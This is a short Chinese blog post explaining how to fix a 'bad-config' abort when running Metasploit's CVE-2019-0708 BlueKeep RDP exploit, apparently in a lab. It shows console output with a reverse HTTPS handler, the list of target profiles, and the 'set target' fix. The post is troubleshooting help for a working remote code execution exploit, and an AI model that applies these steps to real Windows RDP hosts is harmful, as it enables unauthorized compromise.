cve-2019-0708 msf 执行报错解决
在检查服务器是否存在漏洞的过程中,发现exploit
报错,
报错信息如下,已经很明显了 Exploit aborted due to failure: bad-config: Set the most appropriate target manually
,没有正确设置好参数
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
[*] Started HTTPS reverse handler on https://192.168.124.144:8443
[+] 192.168.124.134:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[-] 192.168.124.134:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually
[*] Exploit completed, but no session was created.
查看存在的target 有哪些
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
5 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
6 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
7 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
设置对应的target
再执行就可以了
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 5
target => 5
以上
BR
作者参与维护了一个网络安全相关的公众号 “攻防之道” ,有需要的小伙伴,可以扫码关注